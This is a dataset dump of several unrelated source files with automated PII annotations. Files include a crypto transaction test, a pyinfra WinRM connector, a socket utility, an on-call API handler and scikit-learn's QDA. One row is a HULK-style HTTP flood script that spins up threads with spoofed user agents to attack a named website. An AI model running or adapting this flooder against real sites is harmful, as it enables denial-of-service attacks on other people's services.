assert_equal(testres['allowed'], True) + self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex']) + + # Test a transaction with a large fee. + txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0) + rawTx = self.nodes[0].getrawtransaction(txId, True) + vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000')) + + self.sync_all() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'] }] + # Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98 + outputs = { self.nodes[0].getnewaddress() : Decimal(""0.98000000"") } + rawTx = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx) + assert_equal(rawTxSigned['complete'], True) + # Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB + # Thus, testmempoolaccept should reject + testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0] + assert_equal(testres['allowed'], False) + assert_equal(testres['reject-reason'], 'max-fee-exceeded') + # and sendrawtransaction should throw + assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex']) + # and the following calls should both succeed + testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0] + assert_equal(testres['allowed'], True) + self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000') + + +if __name__ == '__main__': + RawTransactionsTest().main() +",28831,"[['MEDICAL_LICENSE', 'ZZ0000000'], ['MEDICAL_LICENSE', 'ZZ0000000'], ['DATE_TIME', '2014-2020'], ['NRP', 'OrderedDict'], ['PERSON', 'Constructed'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'json'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'address2'], ['PERSON', 'locktime'], ['PERSON', 'locktime'], ['PERSON', 'address2'], ['PERSON', 'address2'], ['PERSON', 'tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress'], ['PERSON', 'self.sync_all'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['PERSON', 'mSigObj = self.nodes[2].addmultisigaddress(2'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['LOCATION', 'addr.'], ['PERSON', 'addr3'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'addr3Obj'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['URL', 'https://github.com/bitcoin/bitcoin/issues/20579'], ['URL', 'framework.me'], ['URL', 'self.se'], ['URL', 'self.nu'], ['URL', 'self.su'], ['URL', 'self.sk'], ['URL', 'self.co'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'tx.de'], ['URL', 'self.no'], ['URL', 'tx.se'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.options.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.log.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.log.in'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.sy'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no']]" +77,"from __future__ import print_function, unicode_literals + +import base64 +import ntpath + +import click + +from pyinfra import logger +from pyinfra.api import Config +from pyinfra.api.exceptions import ConnectError, PyinfraError +from pyinfra.api.util import get_file_io, memoize, sha1_hash + +from .pyinfrawinrmsession import PyinfraWinrmSession +from .util import make_win_command + + +def _raise_connect_error(host, message, data): + message = '{0} ({1})'.format(message, data) + raise ConnectError(message) + + +@memoize +def show_warning(): + logger.warning('The @winrm connector is alpha!') + + +def _make_winrm_kwargs(state, host): + kwargs = { + } + + for key, value in ( + ('username', host.data.winrm_user), + ('password', host.data.winrm_password), + ('winrm_port', int(host.data.winrm_port or 0)), + ('winrm_transport', host.data.winrm_transport or 'plaintext'), + ('winrm_read_timeout_sec', host.data.winrm_read_timeout_sec or 30), + ('winrm_operation_timeout_sec', host.data.winrm_operation_timeout_sec or 20), + ): + if value: + kwargs[key] = value + + # FUTURE: add more auth + # pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp + # see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12 + + return kwargs + + +def make_names_data(hostname): + + show_warning() + + yield dummy@email.com(hostname), {'winrm_hostname': hostname}, [] + + +def connect(state, host): + ''' + Connect to a single host. Returns the winrm Session if successful. + ''' + + kwargs = _make_winrm_kwargs(state, host) + logger.debug('Connecting to: %s (%s)', host.name, kwargs) + + # Hostname can be provided via winrm config (alias), data, or the hosts name + hostname = kwargs.pop( + 'hostname', + host.data.winrm_hostname or host.name, + ) + + try: + # Create new session + host_and_port = '{}:{}'.format(hostname, host.data.winrm_port) + logger.debug('host_and_port: %s', host_and_port) + + session = PyinfraWinrmSession( + host_and_port, + auth=( + kwargs['username'], + kwargs['password'], + ), + transport=kwargs['winrm_transport'], + read_timeout_sec=kwargs['winrm_read_timeout_sec'], + operation_timeout_sec=kwargs['winrm_operation_timeout_sec'], + ) + + return session + + # TODO: add exceptions here + except Exception as e: + auth_kwargs = {} + + for key, value in kwargs.items(): + if key in ('username', 'password'): + auth_kwargs[key] = value + + auth_args = ', '.join( + '{0}={1}'.format(key, value) + for key, value in auth_kwargs.items() + ) + logger.debug('%s', e) + _raise_connect_error(host, 'Authentication error', auth_args) + + +def run_shell_command( + state, host, command, + env=None, + success_exit_codes=None, + print_output=False, + print_input=False, + return_combined_output=False, + shell_executable=Config.SHELL, + **ignored_command_kwargs +): + ''' + Execute a command on the specified host. + + Args: + state (``pyinfra.api.State`` obj): state object for this command + hostname (string): hostname of the target + command (string): actual command to execute + success_exit_codes (list): all values in the list that will return success + print_output (boolean): print the output + print_intput (boolean): print the input + return_combined_output (boolean): combine the stdout and stderr lists + shell_executable (string): shell to use - 'cmd'=cmd, 'ps'=powershell(default) + env (dict): environment variables to set + + Returns: + tuple: (exit_code, stdout, stderr) + stdout and stderr are both lists of strings from each buffer. + ''' + + command = make_win_command(command) + + logger.debug('Running command on %s: %s', host.name, command) + + if print_input: + click.echo('{0}>>> {1}'.format(host.print_prefix, command), err=True) + + # get rid of leading/trailing quote + tmp_command = command.strip(""'"") + + if print_output: + click.echo( + '{0}>>> {1}'.format(host.print_prefix, command), + err=True, + ) + + if not shell_executable: + shell_executable = 'ps' + logger.debug('shell_executable:%s', shell_executable) + + # we use our own subclassed session that allows for env setting from open_shell. + if shell_executable in ['cmd']: + response = host.connection.run_cmd(tmp_command, env=env) + else: + response = host.connection.run_ps(tmp_command, env=env) + + return_code = response.status_code + logger.debug('response:%s', response) + + std_out_str = response.std_out.decode('utf-8') + std_err_str = response.std_err.decode('utf-8') + + # split on '\r\n' (windows newlines) + std_out = std_out_str.split('\r\n') + std_err = std_err_str.split('\r\n') + + logger.debug('std_out:%s', std_out) + logger.debug('std_err:%s', std_err) + + if print_output: + click.echo( + '{0}>>> {1}'.format(host.print_prefix, '\n'.join(std_out)), + err=True, + ) + + if success_exit_codes: + status = return_code in success_exit_codes + else: + status = return_code == 0 + + logger.debug('Command exit status: %s', status) + + if return_combined_output: + std_out = [('stdout', line) for line in std_out] + std_err = [('stderr', line) for line in std_err] + return status, std_out + std_err + + return status, std_out, std_err + + +def get_file( + state, host, remote_filename, filename_or_io, + **command_kwargs +): + raise PyinfraError('Not implemented') + + +def _put_file(state, host, filename_or_io, remote_location, chunk_size=2048): + # this should work fine on smallish files, but there will be perf issues + # on larger files both due to the full read, the base64 encoding, and + # the latency when sending chunks + with get_file_io(filename_or_io) as file_io: + data = file_io.read() + for i in range(0, len(data), chunk_size): + chunk = data[i:i + chunk_size] + ps = ( + '$data = [System.Convert]::FromBase64String(""{0}""); ' + '{1} -Value $data -Encoding byte -Path ""{2}""' + ).format( + base64.b64encode(chunk).decode('utf-8'), + 'Set-Content' if i == 0 else 'Add-Content', + remote_location) + status, _stdout, stderr = run_shell_command(state, host, ps) + if status is False: + logger.error('File upload error: {0}'.format('\n'.join(stderr))) + return False + + return True + + +def put_file( + state, host, filename_or_io, remote_filename, + print_output=False, print_input=False, + **command_kwargs +): + ''' + Upload file by chunking and sending base64 encoded via winrm + ''' + + # Always use temp file here in case of failure + temp_file = ntpath.join( + host.fact.windows_temp_dir(), + 'pyinfra-{0}'.format(sha1_hash(remote_filename)), + ) + + if not _put_file(state, host, filename_or_io, temp_file): + return False + + # Execute run_shell_command w/sudo and/or su_user + command = 'Move-Item -Path {0} -Destination {1} -Force'.format(temp_file, remote_filename) + status, _, stderr = run_shell_command( + state, host, command, + print_output=print_output, + print_input=print_input, + **command_kwargs + ) + + if status is False: + logger.error('File upload error: {0}'.format('\n'.join(stderr))) + return False + + if print_output: + click.echo( + '{0}file uploaded: {1}'.format(host.print_prefix, remote_filename), + err=True, + ) + + return True + + +EXECUTION_CONNECTOR = True +",7847,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'winrm_port'], ['PERSON', 'winrm_transport'], ['PERSON', 'host.data.winrm_transport'], ['PERSON', 'host.data.winrm_hostname'], ['PERSON', 'host_and_port'], ['PERSON', 'TODO'], ['PERSON', 'Args'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['PERSON', 'tmp_command = command.strip'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['LOCATION', 'chunk_size=2048'], ['DATE_TIME', ""1}'.format(host.print_prefix""], ['URL', 'https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12'], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'host.na'], ['URL', 'logger.de'], ['URL', 'kwargs.it'], ['URL', 'kwargs.it'], ['URL', 'logger.de'], ['URL', 'Config.SH'], ['URL', 'pyinfra.api.St'], ['URL', 'logger.de'], ['URL', 'host.na'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'command.st'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'host.connection.ru'], ['URL', 'host.connection.ru'], ['URL', 'response.st'], ['URL', 'logger.de'], ['URL', 'response.st'], ['URL', 'out.de'], ['URL', 'response.st'], ['URL', 'err.de'], ['URL', 'logger.de'], ['URL', 'logger.de'], ['URL', 'click.ec'], ['URL', 'host.pr'], ['URL', 'logger.de'], ['URL', 'io.re'], ['URL', 'System.Co'], ['URL', 'logger.er'], ['URL', 'ntpath.jo'], ['URL', 'logger.er'], ['URL', 'click.ec'], ['URL', 'host.pr']]" +78,"# +# (C) Copyright 2011 Jacek Konieczny dummy@email.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License Version +# 2.1 as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this program; if not, write to the Free Software +# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. +# +# pylint: disable-msg=W0201 + +""""""Utility functions to wait until a socket (or object implementing .fileno() +in POSIX) is ready for input or output."""""" + +from __future__ import absolute_import, division + +__docformat__ = ""restructuredtext en"" + +import select + +if hasattr(select, ""poll""): + def wait_for_read(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for reading. + """""" + if timeout is not None: + timeout *= 1000 + poll = select.poll() + poll.register(socket, select.POLLIN) + events = poll.poll(timeout) + return bool(events) + def wait_for_write(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for writing. + """""" + if timeout is not None: + timeout *= 1000 + poll = select.poll() + poll.register(socket, select.POLLOUT) + events = poll.poll(timeout) + return bool(events) +else: + def wait_for_read(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for reading. + """""" + readable = select.select([socket], [], [], timeout)[0] + return bool(readable) + def wait_for_write(socket, timeout = None): + """"""Wait up to `timeout` seconds until `socket` is ready for writing. + """""" + writable = select.select([], [socket], [], timeout)[1] + return bool(writable) + +",2121,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2011'], ['PERSON', 'Jacek Konieczny'], ['LOCATION', 'Mass Ave'], ['LOCATION', 'Cambridge'], ['LOCATION', 'MA 02139'], ['LOCATION', 'USA'], ['URL', 'email.com'], ['URL', 'poll.re'], ['URL', 'poll.re'], ['URL', 'select.se'], ['URL', 'select.se']]" +79,""""""" +HTTP UNBEARBALE LOAD QUEEN +A HULK EDIT BY @OBN0XIOUS +THE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY +"""""" + +import sys +import argparse +import random +from threading import Thread + +import hulqThreading +import hulqRequest + +parser = argparse.ArgumentParser() +parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.') +parser.add_argument('--website', '-w', help='Website you are attacking.') +systemArguments = parser.parse_args() + +if not systemArguments.website: + sys.exit(""Provide -w or --website."") + +userAgents = \ + ( + 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3', \ + 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \ + 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \ + 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1', \ + 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \ like Gecko Chrome/4.0.219.6 Safari/532.1', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0', \ + 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2', \ + 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US', \ + 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP', \ + 'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51' + ) + + +referers = \ + ( + 'http://www.google.com/?q=', \ + 'http://www.usatoday.com/search/results?q=', \ + 'http://engadget.search.aol.com/search?q=' + ) + + + +for i in range(0, int(systemArguments.threads)): + referer = random.choice(referers) + userAgent = random.choice(userAgents) + t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer)) + t1.start() +",2175,"[['LOCATION', ""help='Choose""], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Firefox/3.5.3'], ['PERSON', 'Mozilla/5.0'], ['LOCATION', 'US'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/4.0'], ['PERSON', 'Mozilla/5.0'], ['PERSON', 'Mozilla/4.0'], ['URL', 't1.st'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '4.0.219.6'], ['DATE_TIME', '1.1.4322'], ['DATE_TIME', '2.5.22'], ['URL', ""http://www.google.com/?q=',""], ['URL', ""http://www.usatoday.com/search/results?q=',""], ['URL', ""http://engadget.search.aol.com/search?q='""], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'systemArguments.th'], ['URL', 'random.ch'], ['URL', 'random.ch'], ['URL', 'hulqRequest.ht']]" +80,"# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license. +# See LICENSE in the project root for license information. +import json +import time +from .events import on_get as get_events +from collections import defaultdict +import requests +from ujson import dumps as json_dumps +from falcon import HTTPStatus, HTTP_200 + + +class PaidEvents(object): + def __init__(self, config): + self.config = config + + def on_get(self, req, resp): + """""" + Search for events. Allows filtering based on a number of parameters, + detailed below. Also returns only the users who are paid to be on call. Uses response from + oncall-bonus to identify paid status. + + **Example request**: + + .. sourcecode:: http + + GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1 + Host: example.com + + **Example response**: + + .. sourcecode:: http + + HTTP/1.1 200 OK + Content-Type: application/json + + { + ""ldap_user_id"": + [ + { + ""start"": 1488441600, + ""end"": 1489132800, + ""team"": ""foo-sre"", + ""link_id"": null, + ""schedule_id"": null, + ""role"": ""primary"", + ""user"": ""foo"", + ""full_name"": ""Foo Icecream"", + ""id"": 187795 + }, + { + ""start"": 1488441600, + ""end"": 1489132800, + ""team"": ""foo-sre"", + ""link_id"": ""PI:KEY"", + ""schedule_id"": 123, + ""role"": ""primary"", + ""user"": ""bar"", + ""full_name"": ""Bar Apple"", + ""id"": 187795 + } + ] + ] + + :query team: team name + :query user: user name + :query role: role name + :query id: id of the event + :query start: start time (unix timestamp) of event + :query end: end time (unix timestamp) of event + :query start__gt: start time (unix timestamp) greater than + :query start__ge: start time (unix timestamp) greater than or equal + :query start__lt: start time (unix timestamp) less than + :query start__le: start time (unix timestamp) less than or equal + :query end__gt: end time (unix timestamp) greater than + :query end__ge: end time (unix timestamp) greater than or equal + :query end__lt: end time (unix timestamp) less than + :query end__le: end time (unix timestamp) less than or equal + :query role__eq: role name + :query role__contains: role name contains param + :query role__startswith: role name starts with param + :query role__endswith: role name ends with param + :query team__eq: team name + :query team__contains: team name contains param + :query team__startswith: team name starts with param + :query team__endswith: team name ends with param + :query team_id: team id + :query user__eq: user name + :query user__contains: user name contains param + :query user__startswith: user name starts with param + :query user__endswith: user name ends with param + + :statuscode 200: no error + :statuscode 400: bad request + """""" + + config = self.config + oncall_bonus_blacklist = config.get('bonus_blacklist', []) + oncall_bonus_whitelist = config.get('bonus_whitelist', []) + bonus_url = config.get('bonus_url', None) + ldap_grouping = defaultdict(list) + + # if start time is not specified only fetch events in the future + if not req.params.get('start__gt'): + req.params['start__gt'] = str(int(time.time())) + + get_events(req, resp) + + # fetch team data from an externall oncall-bonus api + try: + bonus_response = requests.get(bonus_url) + bonus_response.raise_for_status() + except requests.exceptions.RequestException: + raise HTTPStatus('503 failed to contact oncall-bonus API') + + oncall_bonus_teams = bonus_response.json() + + for event in json.loads(resp.body): + if event['role'].lower() == 'manager': + continue + + team = event['team'] + if team in oncall_bonus_whitelist: + ldap_grouping[event['user']].append(event) + continue + if team in oncall_bonus_blacklist: + continue + + # check if event's role is payed for that team + team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None) + if team_payment_details: + team_payed_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)} + if team_payed_roles.get(event['role']): + ldap_grouping[event['user']].append(event) + + resp.status = HTTP_200 + resp.body = json_dumps(ldap_grouping) +",5345,"[['LOCATION', 'BSD-2'], ['NRP', 'self.config'], ['URL', 'config.ge'], ['URL', 'requests.ge'], ['URL', 'requests.exceptions.Re'], ['PERSON', ""team_payment_details.get('primary_paid""], ['PERSON', ""team_payment_details.get('secondary_paid""], ['PHONE_NUMBER', '1487466146'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'de:: '], ['URL', 'self.co'], ['URL', 'example.com'], ['URL', 'self.co'], ['URL', 'config.ge'], ['URL', 'config.ge'], ['URL', 'req.params.ge'], ['URL', 'req.pa'], ['URL', 'resp.bo'], ['URL', 'item.ge'], ['URL', 'details.ge'], ['URL', 'details.ge'], ['URL', 'roles.ge'], ['URL', 'resp.st'], ['URL', 'resp.bo']]" +81,""""""" +Quadratic Discriminant Analysis +"""""" + +# Author: Matthieu Perrot dummy@email.com +# +# License: BSD Style. + +import warnings + +import numpy as np +import scipy.ndimage as ndimage + +from .base import BaseEstimator, ClassifierMixin + + +# FIXME : +# - in fit(X, y) method, many checks are common with other models +# (in particular LDA model) and should be factorized: +# maybe in BaseEstimator ? + +class QDA(BaseEstimator, ClassifierMixin): + """""" + Quadratic Discriminant Analysis (QDA) + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Training vector, where n_samples in the number of samples and + n_features is the number of features. + y : array, shape = [n_samples] + Target vector relative to X + + priors : array, optional, shape = [n_classes] + Priors on classes + + Attributes + ---------- + `means_` : array-like, shape = [n_classes, n_features] + Class means + `priors_` : array-like, shape = [n_classes] + Class priors (sum to 1) + `covariances_` : list of array-like, shape = [n_features, n_features] + Covariance matrices of each class + + Examples + -------- + >>> from sklearn.qda import QDA + >>> import numpy as np + >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]]) + >>> y = np.array([1, 1, 1, 2, 2, 2]) + >>> clf = QDA() + >>> clf.fit(X, y) + QDA(priors=None) + >>> print clf.predict([[-0.8, -1]]) + [1] + + See also + -------- + LDA + """""" + + def __init__(self, priors=None): + self.priors = np.asarray(priors) if priors is not None else None + + def fit(self, X, y, store_covariances=False, tol=1.0e-4): + """""" + Fit the QDA model according to the given training data and parameters. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Training vector, where n_samples in the number of samples and + n_features is the number of features. + y : array, shape = [n_samples] + Target values (integers) + store_covariances : boolean + If True the covariance matrices are computed and stored in the + self.covariances_ attribute. + """""" + X = np.asarray(X) + y = np.asarray(y) + if X.ndim != 2: + raise ValueError('X must be a 2D array') + if X.shape[0] != y.shape[0]: + raise ValueError( + 'Incompatible shapes: X has %s samples, while y ' + 'has %s' % (X.shape[0], y.shape[0])) + if y.dtype.char.lower() not in ('b', 'h', 'i'): + # We need integer values to be able to use + # ndimage.measurements and np.bincount on numpy >= 2.0. + # We currently support (u)int8, (u)int16 and (u)int32. + # Note that versions of scipy >= 0.8 can also accept + # (u)int64. We however don't support it for backwards + # compatibility. + y = y.astype(np.int32) + n_samples, n_features = X.shape + classes = np.unique(y) + n_classes = classes.size + if n_classes < 2: + raise ValueError('y has less than 2 classes') + classes_indices = [(y == c).ravel() for c in classes] + if self.priors is None: + counts = np.array(ndimage.measurements.sum( + np.ones(n_samples, dtype=y.dtype), y, index=classes)) + self.priors_ = counts / float(n_samples) + else: + self.priors_ = self.priors + + cov = None + if store_covariances: + cov = [] + means = [] + scalings = [] + rotations = [] + for group_indices in classes_indices: + Xg = X[group_indices, :] + meang = Xg.mean(0) + means.append(meang) + Xgc = Xg - meang + # Xgc = U * S * V.T + U, S, Vt = np.linalg.svd(Xgc, full_matrices=False) + rank = np.sum(S > tol) + if rank < n_features: + warnings.warn(""Variables are collinear"") + S2 = (S ** 2) / (len(Xg) - 1) + if store_covariances: + # cov = V * (S^2 / (n-1)) * V.T + cov.append(np.dot(S2 * Vt.T, Vt)) + scalings.append(S2) + rotations.append(Vt.T) + if store_covariances: + self.covariances_ = cov + self.means_ = np.asarray(means) + self.scalings = np.asarray(scalings) + self.rotations = rotations + self.classes = classes + return self + + def decision_function(self, X): + """"""Apply decision function to an array of samples. + + Parameters + ---------- + X : array-like, shape = [n_samples, n_features] + Array of samples (test vectors). + + Returns + ------- + C : array, shape = [n_samples, n_classes] + Decision function values related to each class, per sample. + """""" + X = np.asarray(X) + norm2 